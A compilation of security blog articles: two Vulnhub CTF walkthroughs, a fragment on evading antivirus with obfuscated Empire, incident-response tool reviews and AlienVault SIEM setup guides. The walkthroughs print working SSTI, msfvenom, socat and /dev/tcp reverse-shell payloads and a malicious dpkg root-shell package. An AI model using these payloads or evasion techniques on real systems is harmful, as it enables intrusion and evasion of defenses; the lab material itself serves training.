Once the file is executed in the target system; you will get a new session as shown in the image below. To access the new agent, use the following commands:

agents

interact <agent name>



Now the session we have received is through obfuscation, and we will confirm this by using Event Viewer. Follow the same path as earlier (Applications and Services Logs > Microsoft > Windows > PowerShell > Operational) in the Event Viewer to see the log created by our malicious file. As you can see in the image below, the details that the log now has are vague and confusing. This makes the file unreadable by the system and successful in dodging defenses such as anti-viruses.


This way Obfuscated Empire can save you from getting caught in the target system. It is important to learn such techniques to glide by the defenses in the target system to test whether the defenses in the place are proper or not.

Tempus Fugit: 3 Vulnhub Walkthrough


Today we are going to solve another boot2root challenge called "Tempus: 3".  It's available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to @4nqr34z & @theart42. Let's start and learn how to break it down successfully.

Level: Hard

 

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Ghidra

Exploiting

  • SSTI (Server-Side Template Injection)
  • Dump credentials database SQLite
  • Malicious Module Processwire (Reverse Shell)

Privilege Escalation

§  Backups and abuse of OTP Google Authentication

§  Abuse script created users with arbitrary UID

§  Reversing binary and ping binary abuse

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



So, we put the IP address in our "/etc/hosts" file and start by running the map of all the ports with operating system detection, software versions, scripts and traceroute.

$ nmap -A -p- tempusf3.vh

 


Enumeration

We access the web service and start listing versions, code, users...



In the following image, we see 3 users, and the image tells us that we are going to have fun with this machine xD.



We find an authentication panel; we try brute force, but it is not possible to access it.



Forcing the application to show an error, we see that it reflects back whatever we pass it through the URL.



This reminded me that it might be vulnerable to SSTI (Server-Side Template Injection), so let's do a proof of concept:



Exploiting

First, we check what type of template engine is in use: with a payload like {{9*'9'}}, jinja2 will repeat the string the given number of times, whereas an engine such as twig will do the multiplication, giving "81".

As you can see, we are in front of a "jinja2".
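The distinction comes from language semantics: jinja2 evaluates the expression with Python rules, where multiplying a string by an integer repeats it, while a PHP-based engine like twig coerces both operands to numbers. Plain Python reproduces the jinja2 side of the probe:

```python
# jinja2 renders {{9*'9'}} with Python semantics: int * str repeats the string
probe = 9 * '9'
print(probe)  # nine nines, as jinja2 would render it
assert probe == '999999999'

# a numeric engine such as twig would instead compute 9 * 9
assert 9 * 9 == 81
```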



Indeed, it is vulnerable. We are going to try to execute a command to check if it prints it on the screen.

$ {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}



Now we will put a netcat to listen and we will execute the following command to obtain a reverse shell.

$ {{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.10.167/4444 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}
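A note on the magic number 373: it is the position of subprocess.Popen in object's subclass list, which varies between Python builds. If the payload fails, the right offset can be located with a snippet like this, run locally under the same Python version (and assuming the target app has loaded subprocess, as Flask apps typically have):

```python
import subprocess  # loading the module puts Popen in object's subclass list

# str's MRO is (str, object); object.__subclasses__() lists every class
# currently loaded in the interpreter, subprocess.Popen among them.
subclasses = ''.__class__.__mro__[1].__subclasses__()
index = subclasses.index(subprocess.Popen)
print(index)  # the number to substitute for 373 in the payload
```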



We read the file "app.py", this file contains the "secret_key" (flag nº1) and "pragma key".



We decode the base64 and find the first flag.



Listing the binaries we have access to, we find "sqlcipher"; if we look for information about "pragma key", we will find that to dump the information we will need the help of this tool.

These will give us the three registered users on the website and another flag.



We decode and get another flag.



We access the 3 users with their respective passwords, we will obtain the same information.

In that string in base64 we will find the flag nº 2.



We decode again.



If we look, both profiles show us the number "37303". We do an internal port scan with a python script (In google there are many).
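For reference, a minimal scanner of the kind meant here (the function name is ours, not from the box) — a plain TCP connect scan:

```python
import socket

def scan(host, ports, timeout=0.5):
    """Return the ports on host that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                open_ports.append(port)
    return open_ports
```

Dropped onto the target through the reverse shell, scan("127.0.0.1", range(1, 65536)) would reveal internal-only services such as the 37303 above.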

We list three open ports, including "37303".



We do a port forwarding and see that this port corresponds to an OpenSSH.




We repeat the port forwarding, this time with port 443.

We will have access to a new website, we see that it gives us the clue that "Hugh Janus" is the administrator.



We see that the user "Anita" has come up with the great idea, that users can upload files.

We also list the access to the administrator panel.



We try to access with the user "Hugh-janus" but it gives us an error; now we try the user "admin" with Hugh's password, and we enter the panel without problem.



We find an upload form for modules, so we download a proof-of-concept module from the official website.

We unzip, edit the file "Helloworld.module.php" and add a reverse shell to the "else" branch.



We upload the file and load it.



We put a netcat to listen and edit any page of the CMS. We check our terminal and we will have access to the machine.




Privilege Escalation (user Myrtia)

After an exhaustive enumeration, we find an image in the "backups" folder, the name mentions one of the users of the system.



This is a QR code, we read it and it will give us a temporary code to access a service.



This reminded me of a machine I did recently, so I set up this OTPAUTH secret (possibly Google Authenticator) on my cell phone and we connected via SSH.
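Codes like the one behind such a QR follow RFC 6238 (TOTP), which Google Authenticator implements: HMAC-SHA1 of the current 30-second time step, dynamically truncated to 6 digits. If you'd rather generate codes from an extracted secret than enrol a phone, a stdlib sketch (the secret below is the RFC 6238 test vector, not this machine's):

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32, t=None, digits=6, step=30):
    """RFC 6238 TOTP with HMAC-SHA1, as used by Google Authenticator."""
    pad = "=" * (-len(secret_b32) % 8)               # restore base32 padding
    key = base64.b32decode(secret_b32.upper() + pad)
    counter = int((time.time() if t is None else t) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test secret "12345678901234567890", base32-encoded
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", t=59))
```

Called with t=None it uses the current time, producing the same rolling code the phone app would show.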

And also, we check that we can execute the "addcustomer" script with the root user.



We run the script, fill in the data and then check if it is possible to create users.

The following image shows that it is.



At the moment, we don't find it very useful, besides the script is executed from the root directory and we don't have access to it.

We continue listing the user's home files that we have gained access to and read the 4th flag.



Privilege Escalation (user Cecil)

We keep listing files and directories, we find a file called "...", quite suspicious and with a different UID. We do not have access to this file.... But... What if we create a new user and assign this UID?



Let's give it a try! We create a new user, we assign it the UID "1337", and we check that the user has been successfully created by reading "/etc/passwd".



We authenticate with the new user, execute our two favorite commands to get an interactive shell and read the file "...".

We get a private key from OpenSSH.



We are not sure which user it belongs to, so we try one by one until we manage to connect as the user "cecil".

 


Privilege Escalation (root)

According to a clue given by one of its creators, the "ping" binary had to be examined. We open Ghidra and find that the binary opens a shell if the UID matches and the string "deadbeef" is passed when executing the "ping" command.



We already have the user equivalent to the UID, we just need to execute the command specifying "deadbeef".

We execute a ping, the binary will do its checks and will give us a shell as root.



And finally, we will read the last flag.



Author: David Utón is a Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.


Fast Incident Response And Data Collection


In this article, we will gather information utilizing the quick incident response tools which are recorded beneath. All these tools are a few of the greatest tools available freely online. Through these, you can enhance your Cyber Forensics skills.

Table of Contents

·         Live Response Collection-Cederpelta Build

·         CDIR(Cyber Defense Institute Incident Response) Collector

·         Fast IR Collector

·         Panorama

·         Triage-Incident Response

·         IREC -IR Evidence Collector | Binalyze

·         DG Wingman

Introduction

INCIDENT RESPONSE

·         Incident response, organized strategy for taking care of security occurrences, breaks, and cyber attacks.

·         IR plan permits you to viably recognize, limit the harm, and decrease the expense of a cyber attack while finding and fixing the reason to forestall future assaults.

DATA COLLECTION

·         Data collection is the process to securely gather and safeguard your client's electronically stored information (ESI) from PCs, workstations, workers, cloud stores, email accounts, tablets, cell phones, or PDAs.

 

Proof of Concept

Live Response Collection-Cederpelta Build

Live Response Collection - cedarpelta, an automated live response tool, collects volatile data and creates a memory dump. This tool is created by BriMor Labs.

You can download the tool from here.

Live response is the area that deals with collecting data from a live machine to determine whether an incident has occurred. Such information includes artifacts such as process lists, connection information, stored files, registry information, etc.

It supports Windows, OSX/macOS, and *nix-based operating systems. This tool is quite convenient to use because it explains briefly what each option does.

Let’s begin by exploring how the tool works:

The live response collection can be done by the following data gathering scripts

  • Secure-Complete: Picking this choice will create a memory dump, collect volatile information, and also create a full disk image. All the information collected will be compressed and protected by a password.
  • Secure-Memory Dump: Picking this choice will create a memory dump and collect volatile data. All the information collected will be compressed and protected by a password.
  • Secure-Triage: Picking this choice will only collect volatile data. All the information collected will be compressed and protected by a password.

 

  • Complete: Picking this choice will create a memory dump, collect volatile information, and also create a full disk image.
  • Memory dump: Picking this choice will create a memory dump and collect volatile data.
  • Triage: Picking this choice will only collect volatile data.

 

The process of data collection will begin soon after you decide on the above options. This might take a couple of minutes.



After the process is over, it creates an output folder named after your computer alongside the date, at the same destination where the executable file is stored.

 


 

The output folder consists of the following data segregated in different parts.



 

These are a few of the records gathered by the tool. You can check the individual folders according to your evidence requirements. It collects RAM data, network info, basic system info, system files, user info, and much more.



CDIR (Cyber Defense Institute Incident Response) Collector

CDIR (Cyber Defense Institute Incident Response) Collector is a data acquisition tool for the Windows operating system. The tool is created by the Cyber Defense Institute, Tokyo, Japan. The tool collects RAM, registry data, NTFS data, event logs, web history, and much more.

You can download the tool from here.

Let’s begin by exploring how the tool works:

There are three options

1. To initiate the memory dump process (1: ON)

2. To stop the memory dump process and (2: OFF)

3. Exit (0: EXIT)

 

After successful installation of the tool, to create a memory dump select 1 that is to initiate the memory dump process (1:ON)

 


Soon after the process is completed, an output folder is created with the name of your computer alongside the date at the same destination where the executable file is stored.


 

Fast IR Collector

Fast IR Collector is a forensic analysis tool for Windows and Linux OS. It gathers artifacts from the live machine and records the output in .csv or .json documents. This tool is created by SekoiaLab.

You can download the tool from here.

Let’s begin by exploring how the tool works:

You just need to run the executable file of the tool as administrator and it will automatically start the process of collecting data.

 


Results are stored in a folder named output within the same folder where the executable file is stored.



Panorama

Panorama is a tool that creates a fast report of the incident on the Windows system.

You can download the tool from here.

Let’s begin by exploring how the tool works:

·         Run the Panorama.exe on the system.

·         Choose “Report” to create a fast incident overview.



The browser will automatically launch the report after the process is completed.


 

The report data is distributed in a different section as a system, network, USB, security, and others.

Triage

Triage is an incident response tool that automatically collects information for the Windows operating system. Triage-ir is a script written by Michael Ahrendt.

You can simply select the data you want to collect using the checkboxes given right under each tab. Triage IR requires the Sysinternals toolkit for successful execution.

Download here.

 

 

 

Let’s begin by exploring how the tool works:

·         Run the executable file of the tool.

·         Select "Yes" when the prompt appears asking to introduce the Sysinternals toolkit.



·         Click on "Run" after picking the data to gather. The process of data collection will take a couple of minutes to complete.

 


 

·         The data is collected in the folder by the name of your computer alongside the date at the same destination as the executable file of the tool.


 

IREC - IR Evidence Collector | Binalyze

IREC is an easy-to-use forensic evidence collection tool. It is an all-in-one tool, user-friendly as well as malware resistant. This tool is created by Binalyze. A paid version of this tool is also available.
Download the tool from here.

Let’s begin by exploring how the tool works:

You can collect data by two means:

·         Collect evidence: This is for an in-depth investigation.

·         RAM and Page file: This is for memory only investigation

Here we will choose "Collect evidence" for an in-depth investigation. Click Start to proceed further.

 


The process begins after picking the collection profile.



The process is completed. You can analyze the data collected from the output folder.



The output will be stored in a folder named cases, which comprises a folder named by PC name and date, at the same destination as the executable file of the tool.



Here is the HTML report of the evidence collection. The HTML report is easy to analyze; the data collected is classified into various sections of evidence. You can also generate a PDF of your report.



DG Wingman

DG Wingman is a free Windows tool for forensic artifact collection and analysis, created by DigitalGuardian. This tool collects artifacts of importance such as registry logs, system logs, browser history, and many more. It also allows you to execute commands as needed for data collection.

You can download the tool from here.

Let’s begin by exploring how the tool works:

·         Run the executable file of the tool.

·         Use the command wingman.exe /h, which gives you a list of commands along with their functions.

 


 

For example, in the incident, we need to gather the registry logs. We will use the command

wingman.exe -r


 

All the registry entries are collected successfully.



These are amazing tools for first responders, and they speed up your work as an incident responder. They come in handy because they facilitate both data analysis and fast first response, with additional features.

SIEM Lab Setup: AlienVault


AlienVault OSSIM is an open-source Security Information and Event Management (SIEM) solution, which provides you with a feature-rich open-source SIEM complete with event collection, normalization, and correlation. OSSIM is a unified platform providing essential security capabilities like: -

 

·         Asset discovery

·         Vulnerability assessment

·         Host Intrusion detection

·         Network intrusion detection

·         Behavioral monitoring

·         SIEM event correlation


It comes loaded with the power of the AlienVault Open Threat Exchange (OTX). This open threat intelligence community provides community-generated threat intelligence, allows you to collaborate with its members, and automates the process of updating your security infrastructure with threat data from any source.

AlienVault is very useful for monitoring your system's security events and vulnerabilities, and can help you with security audits and assessments such as PCI-DSS.

 



 

So, without wasting more time or much theory let’s begin the installation process.

AlienVault OSSIM ISO can be easily found on the AlienVault OSSIM product page.

 

Table of Contents

·         Prerequisites

·         Installation

·         Setup log monitoring interface

·         Web UI Access

 

Prerequisites

For the installation of AlienVault OSSIM, there are some minimum requirements as listed below.

 

§  VMware or Virtual Box

§  2 NIC (Network interface card) E1000 compatible network cards

(You can have multiple NICs for Log Management or network monitoring)

§  4 CPU cores

§  4-8GB RAM

§  60GB HDD

 

Installation

Once you've downloaded the AlienVault OSSIM ISO file, begin installing it on your virtual machine.

 

To install AlienVault OSSIM

 

·         In your virtual machine, create a new VM instance using the AlienVault OSSIM ISO as the installation source.

 

·         Complete the requirements of AlienVault as shown below.

 



 

Once you launch the new AlienVault instance, select Install AlienVault OSSIM 5.7.4 (64 Bit) and hit Enter as shown below.

 



 

The installation process takes you through a tour of setup options; choose as per your requirements.

 

·         Select the language that you want to use

 



 

Select your location

 



 

Configure the network interfaces.

As we have one or more network interface cards, choose one as the primary network interface for the management server. Its IP address will be used to access the AlienVault OSSIM Web UI. We are going to use eth0 for management, and the rest of the network is connected to eth1.



 

Assign a Unique IP address to the server as shown below. If you don’t know what to use here, consult your network administrator.

 



 

Assign the netmask of the assigned IP address.

 

 



 

Provide the gateway: this indicates the gateway router, also known as the default router. All traffic that goes outside your LAN is sent through this router.



 

The installation process then takes you to set up a root password; this will be used for the root login account in the AlienVault OSSIM console.

 



 

Then, on the next prompt, set up your time zone as the final step.

It will then install the base system. This takes a while depending on your system speed, usually 10-15 minutes to finish the installation, so meanwhile go grab yourself a coffee ☕.

 



You can now log in to the AlienVault OSSIM console with the root user and the password that you designated in the setup process.

 



 

Log in with the credentials of the root account.

 

Setup log monitoring interface

 

After successfully logging in, you must configure the log management interface.

To set up a network interface for log management and scanning follow the steps as described below.

 

Click on System Preferences > Configure Network > Setup Network Interface > eth1 > IP address > netmask.

 

Go to System Preferences

 



 

Select Configure Network

 



 

Select Network Interface

 



 

Select eth1 for log management and scanning.

 



 

Assign a unique IP address to set up a network management interface.

 



 

Assign the netmask of the designated IP address.

 



 

Then come back to the AlienVault setup by selecting Back until you reach the main menu, and then select Apply all Changes as shown below.

 



 

Verify the changes that you have made; if correct, select yes.

 



 

Now you have successfully set up the network interface for log management!



 

Hmm 😃 !! You have successfully installed and set up AlienVault in VMware.

 

Web UI Access

After completing the installation process, you can access the Web UI and set up your admin account.

To access the Web UI, open up your favorite browser and navigate to

 

https://192.168.1.70

 



 

Hold tight! this is not enough…..

Have patience 😉

In this article, we explained the installation and configuration process of AlienVault OSSIM.

In the next article, we will discuss how to send Ubuntu Rsyslog logs to the AlienVault server, along with the manual configuration and installation of the SSH plugin.

 

AlienVault: End user Devices Integration-Lab Setup (Part 2)


As logs never lie, it’s very important to aggregate and analyze the internal and external network logs constantly so that you can prevent a breach or perform incident response on time. In the previous article, we looked at the configuration and installation of AlienVault OSSIM.

Much of the operating-system integration guidance for AlienVault is Windows-centric; here we focus on a Linux platform.

Let’s take a look at the involved process for gathering logs from Linux servers using AlienVault.

 

You can access the previous article from here: - AlienVault Lab setup

 

In this article, we will discuss how to send Ubuntu Rsyslog logs to the AlienVault server, and the manual configuration and installation of the SSH plugin.

 

So, without much theory let’s begin the integration process.

 

Table of Contents

·         Prerequisites

·         Credentials

·         Integration of Rsyslog and SSH plugin to AlienVault OSSIM

 

Prerequisites

For the integration of Rsyslog and SSH plugin to AlienVault OSSIM, there are some minimum requirements as listed below.

 

§  Ubuntu 20.04 or later

§  Root privileges

 

Credentials

·         Ubuntu 20.04 IP: 192.168.1.8

·         AlienVault OSSIM IP: 192.168.1.70

·         OSSIM (CLI) user: root

·         OSSIM password: designated by you at the time of server setup

 

Integration of Rsyslog and SSH plugin to AlienVault OSSIM

 

Ubuntu 20.04

Rsyslog is software used for forwarding log messages in an IP network. It implements the basic Syslog protocol and extends it with content-based filtering capabilities. It also supports different output modules and flexible configuration options, and adds features such as TCP for transport.

 

Make sure port 514 (UDP) is open on both the Ubuntu 20.04 server and the AlienVault OSSIM server, so that the logs can be forwarded via UDP on port 514.

 

Open the rsyslog.conf file and check whether it includes all configuration files or not.

To do this, enter the following commands:

 

cd /etc

nano rsyslog.conf

 


 

 

Uncomment the following line to include all configuration files.

 

$IncludeConfig /etc/rsyslog.d/*.conf

 



 

If this line is already uncommented by default, simply save and exit.

Now we forward the rsyslog logs to the AlienVault OSSIM server.

Create a new configuration file named alienvault.conf and add the following line as shown below:

 

nano alienvault.conf

*.* @192.168.1.70

 

Where 192.168.1.70 is OSSIM server IP.
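The forwarding rule can also be generated non-interactively. A minimal sketch, writing to a temp file instead of /etc/rsyslog.d/alienvault.conf so it can be run safely anywhere; OSSIM_IP mirrors this lab's server:

```shell
# Generate the one-line rsyslog forwarding rule destined for
# /etc/rsyslog.d/alienvault.conf.
OSSIM_IP="192.168.1.70"
conf="$(mktemp)"
printf '*.* @%s\n' "$OSSIM_IP" > "$conf"
cat "$conf"
```

Note that a single `@` forwards over UDP (port 514 by default), while `@@` would forward over TCP.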

 



 

To make the changes effective, restart the rsyslog service with the following command:

 

/etc/init.d/rsyslog restart

 



 

OSSIM Server

Log in to the OSSIM server and jailbreak the server to the CLI as shown below.

 



 

On the next prompt, it will ask you for permission to access the full command line; select yes and continue.

 



 

 

Here we use tcpdump on the OSSIM server to see the log communication between Ubuntu 20.04 and OSSIM, capturing the logs with the following command:

 

tcpdump -i eth0 udp port 514

 



 

Let's verify whether it is receiving logs from the Ubuntu 20.04 server or not.

 

Ubuntu 20.04

On the Ubuntu machine, we switch users by running the following command; afterward, we will check whether the logs of the user switch are reflected on the OSSIM server.

 

sudo su

 



 

Come back to the OSSIM server

OSSIM Server

Let’s check what happens here …

 



 

Hurrah!!! As we can see, the log from the Ubuntu server has arrived at the OSSIM server. Now we will redirect the logs sent to OSSIM into a file.

 

Now we're going to configure filtering in Rsyslog.

To do this, follow the steps below:

Head towards the rsyslog.conf file in the /etc directory.

 

cd /etc

nano rsyslog.conf

 



 

In the GLOBAL DIRECTIVES section, the line "$IncludeConfig /etc/rsyslog.d/*.conf" by default includes every config file in that directory.

 



 

To filter specific rsyslog configurations and logs, put a specific name in place of the * so it can be filtered easily, as shown below:

For example:-

 

$IncludeConfig /etc/rsyslog.d/debian.conf

 



 

 

Now head towards the rsyslog.d directory and create a configuration file debian.conf

 



 

And enter the following rule into it:

 

if $fromhost-ip == '192.168.1.8' then -/var/log/auth.log

&~

 

Then save and exit as shown below
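The same rule can be written non-interactively. A sketch using a temp file in place of /etc/rsyslog.d/debian.conf; SRC_IP is the Ubuntu sender from this lab:

```shell
# Write the host-based filter rule: append messages from the Ubuntu
# sender to auth.log, then discard them ("&~") so they are not
# duplicated by later rules.
SRC_IP="192.168.1.8"
rule="$(mktemp)"
cat > "$rule" <<EOF
if \$fromhost-ip == '$SRC_IP' then -/var/log/auth.log
&~
EOF
cat "$rule"
```

The leading `-` in front of the log path tells rsyslog to buffer writes instead of syncing after every message.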

 



 

Now we check whether the logs of the Ubuntu server are being inserted correctly into auth.log or not.

First restart rsyslog, then follow the steps below:

 

cd /var/log

/etc/init.d/rsyslog restart

tail -f auth.log

 



 

As we can see, logs have started coming from the Ubuntu server 😉

 

Now we move on to the AlienVault part

OSSIM needs a plugin to connect any data source to the server.

Each plugin has two elements: a cfg file and a SQL file.

Let's configure the cfg part first.

To do this, head towards the directory /etc/ossim/agent/plugins:

 

cd /etc/ossim

cd agent/

cd plugins/

 

In the plugins directory, there are lots of plugins available that can be activated in OSSIM.

We will modify one by hand as an example: SSH.

To do this run the following command:

 

cp ssh.cfg debianssh.cfg

 



 

Then open the debianssh.cfg configuration file.

 

nano debianssh.cfg

 



 

Change the plugin id to a number of your choosing, to make it identifiable in the further process.

Here I'm changing the plugin id from 4003 to 9001, as shown below:
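The same id change can be scripted instead of edited in nano. A sketch with sed, where the temp file and the `plugin_id=` line format are stand-ins for illustration; on the real system you would point sed at debianssh.cfg:

```shell
# Change the plugin id non-interactively. The stand-in file mimics
# the plugin_id line of the copied cfg.
cfg="$(mktemp)"
echo "plugin_id=4003" > "$cfg"          # stand-in for debianssh.cfg
sed -i 's/plugin_id=4003/plugin_id=9001/' "$cfg"
cat "$cfg"
```

This is handy when you are preparing several custom plugins and want the id changes to be repeatable.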

 


 

Now we can activate the plugin

Come back to AlienVault setup by entering the following command:

 

alienvault-setup

 



 

And then configure the sensor with the steps below:

 

Select Configure Sensor > Configure Data Source Plugins > debianssh

 

Select Configure sensor

 



Select Configure Data Source Plugins

 



 

In the previous steps, we modified the SSH plugin into the debianssh plugin. Select it in the list of plugins by pressing the spacebar, as shown below.

 



 

Then come back to the AlienVault setup by selecting the Back option, and then Apply All Changes.

 



 

At last, it will ask for your permission to apply all changes

Select yes and then continue

 



 

On the next prompt, it will show you the changes applied.

 



 

 

Let's configure the SQL part of the plugin.

Head towards the directory /usr/share/doc/ossim-mysql/contrib/plugins by entering the following command:

 

cd /usr/share/doc/ossim-mysql/contrib/plugins

 

By running the ls command you can see examples of SQL plugins.

We're going to copy ssh.sql to debianssh.sql by running the following command:

cp ssh.sql debianssh.sql

 



 

Open the debianssh.sql file

 

nano debianssh.sql

 



 

Let's make some modifications in the configuration file so that the plugin cfg matches the SQL database.

The configuration looks similar to what is shown below:

 



 

Change the plugin id from 4001 to 9001, or whatever value you designated in the earlier section, as shown below:

 



 

As you can see, this configuration file contains a predefined database of SSH log signatures, so that if any suspicious SSH activity or request comes to the Ubuntu server, it can be matched against them.

And then Save and exit from the file.

 

Let's put it into action and activate the database by loading it into the OSSIM database.

 

To do this enter the following command:

 

ossim-db < debianssh.sql

ossim-db

select * from plugin where id = 9001;

quit

 



 

And at last, reconfigure the AlienVault OSSIM server by entering the following command:

 

alienvault-reconfig

 



 

On the next screen, it will start reconfiguring the server

 


 

If you are seeing this then congratulations...!!!

You successfully integrated Rsyslog and the SSH plugin into the AlienVault OSSIM server.

 

Hold tight! this is not enough…..

Have patience 😉

In this article, we explained the integration and configuration process of Rsyslog and the SSH plugin with AlienVault OSSIM.

In the next article, our focus will be on the configuration and installation of OSSEC agents that send logs to the AlienVault server.

OSSEC is an open-source Host Intrusion Detection System (HIDS) that runs across multiple OS platforms such as Windows, Linux, Solaris, macOS, etc.

Maskcrafter: 1.1: Vulnhub Walkthrough


Introduction

Today we are going to crack this vulnerable machine called Maskcrafter: 1.1, created by evdaez. It is a simple boot-to-root kind of challenge: we need to get root privileges on the machine and read the root flag to complete it. Overall, it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

·         Network Scanning

o   Netdiscover

o   Nmap

·         Enumeration

o   FTP Anonymous Login

o   Enumerating FTP for hints

o   Enumerating /debug directory

·         Exploitation

o   Crafting Payload using msfvenom

o   Exploiting the Command Injection

·         Post Exploitation

o   Enumerating MySQL database

o   Extracting cred.zip

o   Logging into SSH

o   Enumerating Sudo Permissions

o   Exploiting Sudo Permissions on custom script

o   Enumerating Sudo Permissions

o   Exploiting Sudo Permissions on socat 

·         Privilege Escalation

o   Enumerating Sudo Permissions

o   Crafting deb Installation Package using fpm

o   Installing the malicious package using dpkg

·         Reading Root Flag

Walkthrough

Network Scanning

To attack any machine, we need to find its IP address. This can be done using the netdiscover command. To find the IP address, we correlate the MAC address of the machine, which can be obtained from the virtual machine configuration settings. The IP address of the machine was found to be 192.168.1.110.



Following the netdiscover scan, we run an Nmap scan to get information about the services running on the virtual machine. An aggressive Nmap scan reveals 5 services: FTP (21), SSH (22), HTTP (80), RPC (111), and NFS (2049).

nmap -A 192.168.1.110



Enumeration

Let's start the enumeration stage with the FTP service. It was clear from the Nmap scan that FTP allows anonymous login, so we got inside using it. We listed the contents and found the pub directory. Inside the pub directory, we find 3 files: a NOTES.txt file, a zip file by the name of cred.zip, and a PHP file by the name of rce. Pretty convenient. Let's download all the files to our local system to take a closer look.

ftp 192.168.1.110

Anonymous

ls

cd pub

ls

get NOTES.txt

get cred.zip

get rce.php



First, let's check the NOTES.txt file. It says that there is a web directory by the name of /debug, protected by what might be a strong password; that makes brute force out of the question. The note also confirms that the username is admin.

cat NOTES.txt



We went to take a look at the debug directory and were greeted with a login panel. We knew the username was admin, so we tried admin as the password as well. We were in; that didn't seem so hard. The panel contained 3 commands that can be selected and executed.

http://192.168.1.110/debug/index.php



We used Burp Suite to capture the request and analyze how the commands are sent to the server for execution. We saw that it is a simple parameter with a clear-text command.



Exploitation

This means that we can craft a payload using msfvenom in the raw format and use it to get a session.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.112 lport=1234 R



We copied the raw payload code and replaced the ifconfig command in the captured request in the Burp Suite as shown in the image below:



Before forwarding the request to the application, we start a netcat listener on the port specified in msfvenom, i.e., 1234. After that, we forward the request, and we see that we have a session on the target machine. We use the Python one-liner to convert the shell into a TTY shell. The shell we have is of the www-data user.

nc -lvp 1234

id

python -c 'import pty; pty.spawn("/bin/sh")'

id

Post-Exploitation

We start the enumeration with the /var/www/ directory. We have the debug directory that was mentioned earlier. We see that it contains a php file by the name of db.php. We open it to find the set of credentials for the Database.

ls

cat db.php



We then connect to the database using this set of credentials. After connecting, we list the databases; among those, mydatabase seemed interesting. We enumerated it further to find 2 tables by the names of creds and login. We first listed all the contents of the creds table to find the zip password cred12345!!

mysql -u web -p

P@ssw0rdweb

show databases;

use mydatabase;

show tables;

select * from creds;



We went back to our local machine and used the credentials we just found to unzip the cred.zip file we got earlier. It contained a cred.txt that reads another set of credentials, as shown in the image below.

unzip cred.zip

cat cred.txt



We use this set of credentials to log in via SSH.

Username: userx

Password: thisismypasswordforuserx2020

After logging in on the target machine via SSH, we used the sudo -l command to list all the binaries that have permission to run with elevated privileges. We found a script by the name of whatsmyid.sh that can be executed as the user evdaez. We open the file in the nano editor.

ssh userx@192.168.1.110

sudo -l



We edit it to spawn a bash shell. It is as simple as writing /bin/bash in the script.

#!/bin/bash

/bin/bash



We execute the script using the sudo command with the -u parameter and see that we have a shell as evdaez. We again run the sudo -l command to check for any more binaries that could lead us to root. We see that socat can be run as the user resercherx. Let's get to the resercherx user by exploiting this permission on socat. To do this we have a one-liner that executes socat; it requires a remote host and port, so we first define these variables in the session. We define the RHOST variable with the local IP address of our Kali Linux attacker machine. Next, we define the RPORT variable with a random port number such as 12345. Then we execute socat as the user resercherx with the variables we just declared.

sudo -u evdaez /scripts/whatsmyid.sh

sudo -l

RHOST=192.168.1.112

RPORT=12345

sudo -u resercherx socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane



Before executing the one-liner, we start a socat listener to capture the session generated from the target machine. As soon as the one-liner gets executed, we get a session on our local machine. We then convert this shell into a TTY shell using the Python one-liner. Again, we run the sudo -l command to check for binaries and their permissions. This time we have sudo permissions on dpkg. We need to exploit this to get root access on the machine.

socat file:`tty`,raw,echo=0 tcp-listen:12345

python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l



Privilege Escalation

The dpkg tool is used to install and manage packages. So, to get a root-level shell from dpkg, we need to provide it with a malicious package to install that gives us a shell. We get to our local machine to do this task. We searched dpkg on GTFOBins and found a neat way to elevate privileges via dpkg: craft a package using fpm so that, when installed with dpkg, it grants us a root shell. First, we define a variable TF with the mktemp command, which creates a temporary directory upon execution. Then we write the shell invocation command into a shell file inside TF. Finally, using fpm, we craft the contents of TF into a package. The resultant package is named x_1.0_all.deb. We run the Python script to create an HTTP server and transfer this deb file to the target machine.

TF=$(mktemp -d)

echo 'exec /bin/sh' > $TF/x.sh

fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

ls

python -m SimpleHTTPServer
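The staging part of the steps above can be sketched and verified on any Linux box. fpm and dpkg themselves are omitted here so the sketch runs safely; x.sh carries the shell-spawning payload that the GTFOBins technique packages as a pre-install script:

```shell
# Stage the payload the malicious .deb will carry: a temp directory
# holding a pre-install script that spawns a shell when dpkg runs it.
TF=$(mktemp -d)
echo 'exec /bin/sh' > "$TF/x.sh"
cat "$TF/x.sh"
```

On the attacking machine this staged directory is what fpm turns into x_1.0_all.deb.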



Since we don't have write permissions anywhere else in the application, we went into the tmp directory and downloaded the deb file using the wget command. Now all that is left is to use dpkg with sudo to install the malicious deb file, and we have the root shell. We confirm this using the id command. Then we read the root flag to conclude the machine.

cd /tmp

wget http://192.168.1.112:8000/x_1.0_all.deb

sudo dpkg -i x_1.0_all.deb

id

cd /root

ls

cat root.txt

 

Forensic Investigation : Prefetch File


In this article, we are going to study an important artifact of Windows, i.e. prefetch files. Every time you run an application on your Windows system, such a file is created. These files are called prefetch files. Through this article, we will learn why these files are important and why we need them.

Table of Contents

·         Introduction

·         Forensic Analysis of Prefetch Files

o   WinPrefetch View

o   OS Forensic

o   PECmd

o   FTK Imager

Introduction

A prefetch file is created when you open an application on your Windows system. Windows makes a prefetch record when an application is run from a specific location for the very first time.

